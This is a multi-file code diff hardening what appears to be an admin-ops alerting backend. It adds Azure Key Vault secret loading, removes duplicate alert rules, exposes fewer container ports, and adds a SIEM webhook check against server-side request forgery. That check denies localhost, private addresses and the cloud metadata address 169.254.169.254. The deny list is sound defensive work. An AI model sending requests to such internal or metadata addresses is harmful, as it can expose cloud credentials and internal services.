rules_collection = db["alert_rules"] rules_collection = db["alert_rules"]
@@ -137,6 +138,15 @@ def _create_alert(rule: dict, event: dict):
def seed_default_rules(): def seed_default_rules():
"""Upsert pre-built admin-ops rule templates. Safe for concurrent startup.""" """Upsert pre-built admin-ops rule templates. Safe for concurrent startup."""
# One-time cleanup: remove duplicates by name, keep the oldest (_id ascending)
pipeline = [
{"$sort": {"_id": ASCENDING}},
{"$group": {"_id": "$name", "first_id": {"$first": "$_id"}}},
]
seen = {doc["_id"]: doc["first_id"] for doc in rules_collection.aggregate(pipeline)}
for name, keep_id in seen.items():
rules_collection.delete_many({"name": name, "_id": {"$ne": keep_id}})
defaults = [ defaults = [
{ {
"name": "Failed Conditional Access", "name": "Failed Conditional Access",

View File

@@ -0,0 +1,76 @@
"""Optional Azure Key Vault integration for secrets storage.
If AZURE_KEY_VAULT_NAME is configured, sensitive secrets are fetched from
Azure Key Vault at startup and injected into the environment so that
pydantic-settings can read them. Falls back to .env / environment variables
when Key Vault is not configured.
Secret naming convention in Key Vault:
aoc-client-secret → CLIENT_SECRET
aoc-llm-api-key → LLM_API_KEY
aoc-mongo-uri → MONGO_URI
aoc-webhook-client-secret → WEBHOOK_CLIENT_SECRET
"""
import os
import structlog
logger = structlog.get_logger("aoc.secrets")
_KEY_VAULT_SECRET_MAP = {
"aoc-client-secret": "CLIENT_SECRET",
"aoc-llm-api-key": "LLM_API_KEY",
"aoc-mongo-uri": "MONGO_URI",
"aoc-webhook-client-secret": "WEBHOOK_CLIENT_SECRET",
}
def _load_from_key_vault(vault_name: str) -> dict[str, str]:
"""Fetch secrets from Azure Key Vault and return as {env_name: value}."""
try:
from azure.identity import DefaultAzureCredential
from azure.keyvault.secrets import SecretClient
except ImportError as exc:
raise RuntimeError(
"Azure Key Vault libraries are not installed. Run: pip install azure-identity azure-keyvault-secrets"
) from exc
vault_url = f"https://{vault_name}.vault.azure.net/"
credential = DefaultAzureCredential()
client = SecretClient(vault_url=vault_url, credential=credential)
loaded = {}
for kv_name, env_name in _KEY_VAULT_SECRET_MAP.items():
try:
secret = client.get_secret(kv_name)
if secret.value:
loaded[env_name] = secret.value
logger.info("Loaded secret from Key Vault", secret_name=kv_name)
except Exception as exc:
logger.warning(
"Failed to load secret from Key Vault",
secret_name=kv_name,
error=str(exc),
)
return loaded
def load_key_vault_secrets(vault_name: str | None = None):
"""Load secrets from Azure Key Vault into os.environ if configured.
This should be called BEFORE pydantic-settings parses configuration.
"""
vault = vault_name or os.environ.get("AZURE_KEY_VAULT_NAME", "")
if not vault:
return
logger.info("Loading secrets from Azure Key Vault", vault_name=vault)
secrets = _load_from_key_vault(vault)
for env_name, value in secrets.items():
os.environ[env_name] = value
logger.info(
"Key Vault secrets loaded",
count=len(secrets),
keys=list(secrets.keys()),
)

View File

@@ -1,15 +1,43 @@
import ipaddress
import requests import requests
import structlog import structlog
from config import SIEM_ENABLED, SIEM_WEBHOOK_URL from config import SIEM_ALLOWED_DOMAINS, SIEM_ENABLED, SIEM_WEBHOOK_URL
logger = structlog.get_logger("aoc.siem") logger = structlog.get_logger("aoc.siem")
def _validate_siem_url(url: str):
"""Prevent SSRF by rejecting internal/reserved addresses and enforcing domain allowlist."""
from urllib.parse import urlparse
parsed = urlparse(url)
if parsed.scheme != "https":
raise RuntimeError("SIEM_WEBHOOK_URL must use HTTPS")
hostname = (parsed.hostname or "").lower()
if not hostname:
raise RuntimeError("SIEM_WEBHOOK_URL must have a valid hostname")
blocked = {"localhost", "127.0.0.1", "0.0.0.0", "::1", "169.254.169.254"}
if hostname in blocked:
raise RuntimeError(f"SIEM_WEBHOOK_URL hostname '{hostname}' is not allowed")
try:
ip = ipaddress.ip_address(hostname)
if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
raise RuntimeError(f"SIEM_WEBHOOK_URL IP '{hostname}' is not allowed")
except ValueError:
pass
if SIEM_ALLOWED_DOMAINS:
allowed = any(hostname == d or (d.startswith("*.") and hostname.endswith(d[1:])) for d in SIEM_ALLOWED_DOMAINS)
if not allowed:
raise RuntimeError(f"SIEM_WEBHOOK_URL domain '{hostname}' is not in SIEM_ALLOWED_DOMAINS")
def forward_event(event: dict): def forward_event(event: dict):
"""Forward a normalized event to the configured SIEM webhook.""" """Forward a normalized event to the configured SIEM webhook."""
if not SIEM_ENABLED or not SIEM_WEBHOOK_URL: if not SIEM_ENABLED or not SIEM_WEBHOOK_URL:
return return
try: try:
_validate_siem_url(SIEM_WEBHOOK_URL)
res = requests.post(SIEM_WEBHOOK_URL, json=event, timeout=10) res = requests.post(SIEM_WEBHOOK_URL, json=event, timeout=10)
res.raise_for_status() res.raise_for_status()
logger.debug("Event forwarded to SIEM", event_id=event.get("id")) logger.debug("Event forwarded to SIEM", event_id=event.get("id"))

View File

@@ -51,18 +51,32 @@ def client(mock_events_collection, mock_watermarks_collection, monkeypatch):
# Mock Redis so tests don't require a running Redis server # Mock Redis so tests don't require a running Redis server
class FakeRedis: class FakeRedis:
_store = {}
async def get(self, key): async def get(self, key):
return None return self._store.get(key)
async def setex(self, key, ttl, value): async def setex(self, key, ttl, value):
self._store[key] = value
async def incr(self, key):
self._store[key] = self._store.get(key, 0) + 1
return self._store[key]
async def expire(self, key, ttl):
pass pass
async def fake_get_arq_pool(): async def fake_get_arq_pool():
return FakeRedis() return FakeRedis()
async def fake_get_redis():
return FakeRedis()
monkeypatch.setattr("redis_client.get_arq_pool", fake_get_arq_pool) monkeypatch.setattr("redis_client.get_arq_pool", fake_get_arq_pool)
monkeypatch.setattr("redis_client.get_redis", fake_get_redis)
monkeypatch.setattr("routes.ask.get_arq_pool", fake_get_arq_pool) monkeypatch.setattr("routes.ask.get_arq_pool", fake_get_arq_pool)
monkeypatch.setattr("routes.jobs.get_redis", fake_get_arq_pool) monkeypatch.setattr("routes.jobs.get_redis", fake_get_redis)
monkeypatch.setattr("rate_limiter.get_redis", fake_get_redis)
from main import app from main import app

View File

@@ -268,7 +268,7 @@ def test_health(client):
def test_metrics(client): def test_metrics(client):
response = client.get("/metrics") response = client.get("/metrics", headers={"X-Forwarded-For": "127.0.0.1"})
assert response.status_code == 200 assert response.status_code == 200
assert "aoc_request_duration_seconds" in response.text assert "aoc_request_duration_seconds" in response.text

View File

@@ -3,8 +3,7 @@ services:
image: valkey/valkey:8-alpine image: valkey/valkey:8-alpine
container_name: aoc-redis container_name: aoc-redis
restart: always restart: always
ports: # Ports not exposed to host; backend and worker connect via Docker network
- "6379:6379"
volumes: volumes:
- redis_data:/data - redis_data:/data
@@ -12,8 +11,7 @@ services:
image: mongo:7 image: mongo:7
container_name: aoc-mongo container_name: aoc-mongo
restart: always restart: always
ports: # Ports not exposed to host; backend and worker connect via Docker network
- "27017:27017"
environment: environment:
MONGO_INITDB_ROOT_USERNAME: ${MONGO_ROOT_USERNAME} MONGO_INITDB_ROOT_USERNAME: ${MONGO_ROOT_USERNAME}
MONGO_INITDB_ROOT_PASSWORD: ${MONGO_ROOT_PASSWORD} MONGO_INITDB_ROOT_PASSWORD: ${MONGO_ROOT_PASSWORD}